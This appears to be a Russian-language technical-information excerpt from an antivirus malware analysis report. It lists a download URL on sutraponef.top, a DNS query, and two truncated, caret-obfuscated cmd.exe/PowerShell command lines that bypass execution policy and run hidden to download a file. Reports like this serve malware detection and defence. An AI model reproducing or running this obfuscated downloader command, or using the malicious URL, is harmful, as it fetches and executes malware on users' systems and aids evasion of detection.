Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^wers^h^Ell^.eXe^ -eXecu^TI^oNP^o^l^I^cY^ byp^as^S -NO^P^RofilE -wi^N^D^OW^St^ylE^ ^H^i^dDe^n^ ^(NEW^-obj^ect SysTeM^.^net.WEB^ClI^eNt^).^d^ownL^OA^df^iLe('http://sutraponef...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "po^wers^h^Ell^.eXe^ -eXecu^TI^oNP^o^l^I^cY^ byp^as^S -NO^P^RofilE -wi^N^D^OW^St^ylE^ ^H^i^dDe^n^ ^(NEW^-obj^ect SysTeM^.^net.WEB^ClI^eNt^).^d^ownL^OA^df^iLe('http://sutraponef...' (со скрытым окном)